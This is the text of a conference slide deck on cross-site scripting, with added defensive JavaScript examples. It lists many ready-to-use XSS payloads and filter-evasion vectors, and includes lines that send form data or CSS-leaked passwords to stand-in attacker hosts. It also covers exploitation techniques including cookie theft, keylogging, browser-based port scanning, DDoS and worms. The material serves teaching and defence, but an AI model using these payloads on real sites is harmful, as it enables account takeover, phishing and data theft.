XSS is more than a simple threat
Avădănei Andrei, Software Developer, Blogger, Student
www.worldit.info, @AndreiAvadanei, [email_address]
#RoCyberCon, 20 February
Introduction to XSS: short story, XSS types, shouts
Short story
- XSS is a client-side vulnerability ...
- ... but it can become a server-side one (the injected script can drive authenticated requests against the server)
- based on JavaScript injection ...
- ... and also on HTML, Java, ActiveX, VBScript, Flash, JSON and so on
- the second most common web application threat in 2010 (Infosec; OWASP Top 10 2010, where XSS is A2)
- with many resources available on the Internet (use Google)
XSS types
Non-persistent (reflected)
- the most common type of XSS injection
- the server echoes the attacker's input (typically from the query string) straight back into the response
- a third party is required: the victim has to open the crafted link
Persistent (stored)
- the most dangerous type of XSS injection
- the server stores the payload (comment, profile field, message) and serves it to every visitor
- a third party may not be required: anyone who views the page is hit
DOM-based
- the newest type (described by Amit Klein in 2005)
- interpreted entirely on the client: the page's own JavaScript writes attacker-controlled data (location.hash, document.referrer, ...) into the DOM
- usually non-persistent, and the payload may never reach the server at all
Shouts #1: XSS in Amazon
Shouts #2: XSS in Facebook
Shouts #3: XSS in Google
Shouts #4: XSS in eBay
Shouts #5: more XSS'ed: Twitter, MySpace, Hi5, WordPress, Yahoo, Joomla, phpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, YouTube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc.
Getting XSS'ed: where?, basic XSS'ing, advanced XSS'ing, HTML5 XSS'ed, bypassing XSS protection
Where? Everywhere.
Rule: "Do not trust anything, ever, especially when it comes to user input."
XSS vulnerabilities can be found in anything that comes from the user. GET, POST, COOKIE, FILES, SERVER and the request headers are the main targets. Try to be clever.
Basic XSS'ing
<script>alert(1)</script>  // basic
"><script>alert(1)</script>  // close the open tag or attribute first
<!--<img src="--><img src=x onerror=alert(1)//">  // break out of an HTML comment and trigger the error handler
" onmouseover="alert(1)"  // any JavaScript event handler works
alert(/XSS/.source) or alert(String(/Test/).substr(1,4));  // other simple vectors that need no quotes
<script>alert(String.fromCharCode(88,83,83));</script>  // bypass quote filters
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>  // encoded payload: decimal character references here; hex, UTF-8 or octal encodings may also get past a filter that only inspects the raw input
<meta http-equiv="refresh" content="0;url=http://;javascript:...">  // evasion
<style type=text/javascript>alert('xss')</style>  // JavaScript via a style tag (legacy browsers only)
"><img src="x:x" onerror="alert(0)">  // :D
[...]
Advanced XSS'ing
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">  // meta refresh to a data: URL carrying the script
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">  // background-image with CSS hex escapes spelling url('javascript:alert(...)')
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>  // CSS expression() split up by comments; can send IE into a loop of alerts
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>  // XSS via an XML data island (IE data binding)
x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)();  // something different from everyday injections: the literal decodes to alert(1)
Function('a\x6cert(1)')();  // ;)
x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );  // eval + octal escapes: the inner eval turns the literal '\141\154\145\162\164\050\061\051' into the string alert(1), the outer eval runs it
[...]
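Every encoded vector in the two lists above relies on a decode step that the browser (character references in an attribute) or the JavaScript engine (string escapes before eval/Function) performs after any filter has already looked at the input. The block below is an added example, not code from the slides: it performs those same decode steps so a server-side check is applied to what will actually run, and contrasts it with a blacklist on the raw bytes. The function names (decodeNumericEntities, decodeJsStringEscapes, buildOctalLiteral, looksLikeJavascriptUrl, naiveBlacklist) are my own, and the input strings are the payloads from the slides.

```javascript
// Added example: normalise encoded XSS payloads before inspecting them.
// All function names here are my own; they are not part of the slides.

// Browsers decode &#106; and &#x6A; (and, tolerantly, the semicolon-less
// &#106 / &#x6A) inside an attribute value before treating it as a URL.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, code) => {
    const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// A JavaScript string literal accepts \xHH, \uHHHH, \u{H..H} and (in sloppy
// mode) the legacy octal \NNN form; eval()/Function() only ever see the
// decoded text, which is why 'a\x6cert(1)' runs alert(1).
function decodeJsStringEscapes(s) {
  return s.replace(/\\(x[0-9a-f]{2}|u\{[0-9a-f]+\}|u[0-9a-f]{4}|[0-7]{1,3})/gi, (match, esc) => {
    const e = esc.toLowerCase();
    if (e[0] === 'x') return String.fromCharCode(parseInt(e.slice(1), 16));
    if (e[0] === 'u') {
      const cp = parseInt(e[1] === '{' ? e.slice(2, -1) : e.slice(1), 16);
      return cp > 0x10ffff ? match : String.fromCodePoint(cp);
    }
    return String.fromCharCode(parseInt(e, 8));
  });
}

// The x(x(...)) vector on the slide assembles its argument from octal escapes.
// Rebuilt here without eval() so the intermediate literal can be inspected.
function buildOctalLiteral() {
  const b = '\\', s = '\'', o = '0';
  return s + b + 141 + b + 154 + b + 145 + b + 162 + b + 164 + b + o + 50 + b + o + 61 + b + o + 51 + s;
}

// Scheme check done in the order the browser does it: decode character
// references, drop leading ASCII whitespace/controls and any embedded
// tab/newline, then look at the scheme.
function looksLikeJavascriptUrl(raw) {
  const decoded = decodeNumericEntities(raw)
    .replace(/^[\x00-\x20]+/, '')
    .replace(/[\t\n\r]/g, '');
  return decoded.toLowerCase().startsWith('javascript:');
}

// The blacklist many filters actually implement: it inspects the raw bytes only.
function naiveBlacklist(raw) {
  return raw.toLowerCase().includes('javascript:');
}
```

The point to take away: normalise first, then decide. A filter that compares the raw value against "javascript:" passes the IMG SRC vector above, while the normalised check catches it and also the tab/newline variants the URL parser silently strips.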
HTML5 XSS'ed: new technologies, new problems
<video onerror="javascript:alert(1)"><source>  // new tag
<audio onerror="javascript:alert(1)"><source>  // another new tag
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X  // new events (from an early HTML5 draft; both were later dropped from the spec)
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil payload')"><h3>DRAG ME!!</h3></div>  // new functions, events and attributes
<input type="text" AUTOFOCUS onfocus=alert(1)>  // fires without any user interaction
<script>alert(localStorage.getItem('foo'))</script>  // access local storage
"><script>history.pushState({}, '', 'index.php'); document.forms[0].action='http://maliciousURL'</script>  // conceal the real location and point the form at anything we want. Ex: http://bit.ly/pushStateXSS
Bypassing XSS protection
<img/src="mars.png"alt="mars">  // no whitespace: use / as the separator
<object data="javascript:alert(0)">  // avoid src
<isindex type=image src=1 onerror=alert(1)>  // did you know the isindex tag?
<img src=x:alert(alt) onerror=eval(src) alt=0>  // another error-handler bypass
location=location.hash.slice(1);  // use the fragment: everything after # is never sent to the server, so it is absent from logs and server-side filters
http://victim.com?param=";location=location.hash)//#0={};alert(0)  // payload after the #: the victim (and the server) never sees the true payload
alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie)  // same result
""+{toString:alert} or ""+{valueOf:alert}  // calls a function without using () or =
Future tricks in HTML5
</a onmousemove="alert(1)">  // event handler on a closing tag; a browser quirk rather than HTML5 behaviour (the spec ignores attributes on end tags)
<style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style>  // CSS-only, no script: attribute selectors leak a field's value attribute one character at a time
data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==  // avoid a plain text/html payload
?injection=<script+&injection=>alert(1)></script>  // HTTP Parameter Pollution: a backend that joins duplicate parameters reassembles the tag; popular in SQLi, via BlackHat conferences
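The last vector above only works because of how the backend resolves a parameter that appears twice: each half on its own is harmless, the joined value is a script tag. The block below is an added example, not code from the slides: a query-string parser that keeps every occurrence and resolves the name under the policies real frameworks use. The policy table, the join separators and the function names (parseQuery, resolveParam, containsScriptTag, hppAnalysis) are my own assumptions to confirm against the actual target, not a claim about a specific product.

```javascript
// Added example: HTTP Parameter Pollution against the last vector above.
// POLICIES, parseQuery, resolveParam, containsScriptTag and hppAnalysis are my
// own; the separators are assumptions, not a statement about any one framework.

// How a duplicated parameter may be resolved. Frameworks differ: some take the
// first value, some the last, some concatenate, some hand back a list.
const POLICIES = {
  first: (values) => values[0],
  last: (values) => values[values.length - 1],
  joinComma: (values) => values.join(','),
  joinCommaSpace: (values) => values.join(', '),
  list: (values) => values.slice(),
};

// application/x-www-form-urlencoded decoding; a malformed %-sequence is kept
// verbatim rather than aborting the parse.
function formDecode(s) {
  const spaced = s.replace(/\+/g, ' ');
  try { return decodeURIComponent(spaced); } catch (e) { return spaced; }
}

// Parser that keeps every occurrence of a name, in order of appearance.
function parseQuery(query) {
  const params = new Map();
  for (const pair of query.replace(/^\?/, '').split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = formDecode(eq === -1 ? pair : pair.slice(0, eq));
    const val = formDecode(eq === -1 ? '' : pair.slice(eq + 1));
    if (!params.has(key)) params.set(key, []);
    params.get(key).push(val);
  }
  return params;
}

function resolveParam(query, name, policy) {
  const values = parseQuery(query).get(name) || [];
  return values.length ? POLICIES[policy](values) : undefined;
}

// The check a naive filter or WAF applies per value: a complete opening script tag.
function containsScriptTag(s) {
  return /<script\b[^>]*>/i.test(s);
}

// What the filter sees (each occurrence separately) versus what the application
// sees (after the duplicates have been resolved under the given policy).
function hppAnalysis(query, name, policy) {
  const values = parseQuery(query).get(name) || [];
  const resolved = resolveParam(query, name, policy);
  return {
    individualHits: values.map(containsScriptTag),
    resolved,
    resolvedHit: containsScriptTag(String(resolved)),
  };
}
```

Under joinComma the slide's query resolves to <script ,>alert(1)></script>, which the HTML parser accepts as a script tag with a junk attribute; a filter that inspected each occurrence separately saw nothing. The defence is to fix the resolution (reject or explicitly handle duplicates) and to filter the resolved value, not the raw occurrences.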
XSS injection exploitation (part 1): redirection, clickjacking, URL spoofing, session hijacking, cookie stuffing, ad hijacking, CSRF/XSRF attacks, history stealing, XSS defacement, key and mouse logging
Redirection & Clickjacking
Redirection
- redirect the victim, e.g. document.location = "http://www.your-evil-site.com";
- used to create fake traffic
- popular
Clickjacking
- the target page is loaded in a transparent iframe on top of a decoy, so the victim's click lands on the hidden page; in this deck's use, an onclick handler that sends the victim to the attacker
- used in phishing; gives high credibility because the real site is what gets clicked
- extremely popular
URL Spoofing
- popular in phishing
- the URL looks friendly and legitimate
- the page content is hijacked and everything the user enters is sent to a site monitored by the thief
- extremely popular
Session Hijacking
- also known as "cookie stealing"
- usually done with document.cookie
- lets you take over another user's logged-in session
- needs a cookie grabber (a script on the attacker's server that records the cookie sent to it)
- for instance, an XSS in *.yahoo.com can be used to hijack Yahoo accounts
- caveat: a cookie flagged HttpOnly is not readable from document.cookie; the injected script can still act as the victim by issuing requests from inside the page
- extremely popular
Cookie stuffing
- also known as cookie dropping
- used in blackhat online marketing
- generates illegitimate affiliate sales by planting affiliate cookies in the victim's browser
- uses pop-ups, frames and iframes, images, JavaScript, stylesheets or Flash to drop the cookie
- popular
Ad Hijacking
- used in blackhat online marketing
- usually requires persistent XSS
- replace the site's ad scripts with your own and get paid when users click the hijacked ads
- popular
CSRF/XSRF attacks
- unauthorized commands are transmitted from a user the website trusts
- usually delivered with <img src="">: for instance, if <img src="http://victim.com/?do=logout" /> is injected persistently, every user who views the page with the malformed content is forced to log out
- use your imagination, you can do more than that: any state-changing action reachable by a GET request works the same way
- caveat: anti-CSRF tokens alone do not stop this, because an XSS on the target origin can read the token and submit it
History Stealing
- find out which sites the victim has visited using getComputedStyle, as below, after creating a link node styled with a :visited selector that sets a known colour:
document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
- rarely used, but still important
- it can also be done with the full power of HTML5
- caveat: browsers began restricting what :visited may style and making getComputedStyle lie about it in 2010-2011, so this direct form no longer works in current browsers
XSS Defacement
- looks like a server-side defaced page ... but it is only a client-side deface
- creates chaos and confusion when used in hacking a website
- involves changing the HTML content of the page
- of course, two types: persistent and non-persistent
- a persistent XSS deface is more dangerous than a non-persistent one
Key & Mouse Logging
Keylogging
- log all keystrokes and send them remotely
- document.onkeypress (or unsafeWindow.onkeypress from a Greasemonkey script) events
- store keystrokes in a local variable and send them at regular intervals to a remote server
Mouse logging
- log all mouse movements and send them remotely
- document.onmousemove event
- dangerous but not so popular
Tired? You shouldn't be, because this is only the beginning...
XSS injection exploitation (part 2): browser hijacking, port scanning, DDoS, XSS tunneling, distributed password cracking, worms (spreading), arbitrary file execution & privilege escalation, intranet hacking
Browser Hijacking
- also known as tab hijacking
- highly recommended when the attacker wants a second shot at the victim
- XSS shells usually do it for you, with iframe injection: the page is replaced by a full-window iframe under the attacker's control
- works until the victim closes the tab
- the only drawback is that the URL bar does not change with each click, which may or may not be noticed by the user
Distributed port scanning
- cross-domain XMLHttpRequest and WebSockets can be used for remote port scanning (by timing how long a connection attempt takes); with XSS you can do it distributed, from many victims' browsers
- the latest Firefox, Chrome and Safari already support these technologies
- not available yet in XSS Shell, but it will be in the next generation
- connection timing on Firefox and Safari is under 100 ms per port
- 1 victim, 65,000 ports: 6,500 seconds
- 100 victims, 65,000 ports: 65 seconds
- what about 1,000 or 10,000 victims?
- caveat: browsers refuse to connect to a built-in list of banned ports (SMTP, POP3 and others), so those stay invisible to this technique
DDoS
- based on WebSockets and cross-origin requests
- application-level DDoS (layer 7)
- cross-origin requests (COR) are processed by the server even if the site does not allow the origin: for a simple GET the browser enforces the restriction on the response, after the server has already done the work, so the request still creates load
- 1 minute, 1 browser: 10,000 requests/minute using COR from WebWorkers with GET requests
- 1 minute, 600 browsers: 6,000,000 requests/minute, which can be enough to shut down a target
- we should wait for the majority of browsers in the world to be upgraded
- but blackhat teams will be ready with amazing DDoS tools
XSS Tunneling
- an XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack; at the technical level it may be an Ajax application. Node.js and Comet push can make a difference in future XSS shells.
- XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel, to use virtually any application that supports HTTP proxies
- XSS Tunnel is the standard HTTP proxy which sits on the attacker's system
- you can tunnel all your traffic through an XSS Channel
- you can build your own SSH-like protocol
- you can forget about the session problem when hijacking is not possible because of an IP address restriction: every request originates from the victim's browser and IP address
- again, your imagination is the limit
Distributed Password Cracking
- JavaScript engines are becoming very fast, and we have WebWorkers
- password guessing rates in JavaScript tools of 100,000 MD5 hashes/second
- ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code
- but these days spreading methods are very effective: why not 10,000 compromised machines?
- Ravan: a JavaScript distributed password cracker that uses HTML5 WebWorkers; performs password cracking in background JavaScript threads; supports salted MD5 and SHA hashes
Worms (spreading)
- one of the most efficient environments for worm propagation: social networking
- XSS Warhol worm, linear XSS worm, Hydra XSS worm
- Samy (2005) infected over 1,000,000 MySpace users in 20 hours
- Yahoo!, Hi5, Twitter and Facebook could easily be the next targets, on a larger scale
- you can simply attach a trojan to your worm, and the risk of creating permanent zombies is growing
Arbitrary file execution
- in 2008 a vulnerability affecting IE 7 and IE 8 allowed arbitrary files to be executed with some social engineering
- over the last few years a few other similar vulnerabilities have appeared in the Internet jungle
- still, take an XSS vulnerability and an administrator file editor: its CSRF protection does not help, because the XSS payload runs same-origin and can read the token and submit the editor form with XMLHttpRequest. With that combination an XSS vulnerability has become arbitrary code execution on the server (privilege escalation).
- what are you waiting for? Find the next major privilege escalation vulnerability.
Intranet Hacking (part 1)
Web browsers can be completely controlled by any web page, enabling them to become launching points to attack internal network resources. Why?
Intranet Hacking (part 2)
Exploit procedure:
- a victim visits a malicious web page or clicks a nefarious link; embedded JavaScript malware then takes control of their web browser
- the JavaScript malware loads a Java applet that reveals the victim's internal (NAT) IP address (Java applets have since been removed from browsers)
- then, using the victim's web browser as an attack platform, the JavaScript malware identifies and fingerprints web servers on the internal network
- attacks are launched against internal or external websites, and the compromised information is sent outside the network for collection
Intranet Hacking (part 3)
Collecting information:
- obtaining the NAT'ed IP address: MyAddress, a special Java applet
- port scanning: <script src=http://ip/></script>, watching the onload/onerror events and how long they take
- blind web server fingerprinting: use image URLs, CSS or JavaScript files that only a given product serves: <img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />
Attack the intranet:
- try different well-known vulnerabilities
- try hacking the web interface of DSL routers
- load local files using file:///
- get help from XSS shells
Preventing XSS attacks
- filtering input / output encoding, applied per output context (HTML body, attribute, URL, JavaScript)
- mark session cookies HttpOnly so document.cookie cannot read them, and use a Content Security Policy where the browser supports it
Web browser security
- select a safer browser (Chrome)
- use a virtual machine for suspicious links
- pay more attention to shortened URLs
- use plugins for better security (like NoScript)
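Output encoding is the server-side control the slide names, and it only works when the encoding matches the context the value lands in. The block below is an added example, not code from the slides or from any project: a made-up search results page rendered once the vulnerable way (the reflected case from the type list) and once with context-aware encoding, using the slide's own payloads as input. The function names (encodeForHtml, encodeForHtmlAttribute, safeUrl, renderVulnerable, renderSafe), the example page and the assumption that relative links resolve against the site's own origin are mine.

```javascript
// Added example: context-aware output encoding for a reflected parameter.
// Names and the rendered page are my own; the payloads come from the slides.

// HTML body and quoted-attribute contexts: five characters are enough, provided
// the attribute really is quoted (an unquoted attribute ends at the first space,
// which is exactly what the " onmouseover= vector abuses).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function encodeForHtmlAttribute(s) {
  return encodeForHtml(s); // same table; callers must wrap the value in double quotes
}

// URL contexts (href, src, meta refresh): encoding cannot help, because
// javascript: and data: are perfectly well-formed attribute values. Allow-list
// the scheme with the WHATWG URL parser, which already strips the leading
// whitespace and embedded tabs/newlines that string filters miss.
// Assumption: relative URLs resolve against this site's own origin.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeUrl(candidate, base = 'https://example.invalid/') {
  let url;
  try { url = new URL(String(candidate), base); } catch (e) { return null; }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : null;
}

// Before: reflected XSS. The search term is concatenated into an attribute and
// into the body, so "><script>... closes the input tag and runs; the link is
// emitted as given, so javascript: runs on click.
function renderVulnerable(term, link) {
  return `<input name="q" value="${term}">` +
         `<p>Results for ${term}</p>` +
         `<a href="${link}">source</a>`;
}

// After: each value is encoded for the context it lands in, and the link is
// validated as a URL rather than pattern-matched as a string.
function renderSafe(term, link) {
  const href = safeUrl(link) || '#';
  return `<input name="q" value="${encodeForHtmlAttribute(term)}">` +
         `<p>Results for ${encodeForHtml(term)}</p>` +
         `<a href="${encodeForHtmlAttribute(href)}">source</a>`;
}
```

The same discipline applies on the client for the DOM-based case: data from location.hash or document.referrer goes into textContent or an attribute setter, never into innerHTML or document.write.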
XSS: is it still a simple threat? :)
Questions? Thanks. :)
Bibliography: experience & Google.
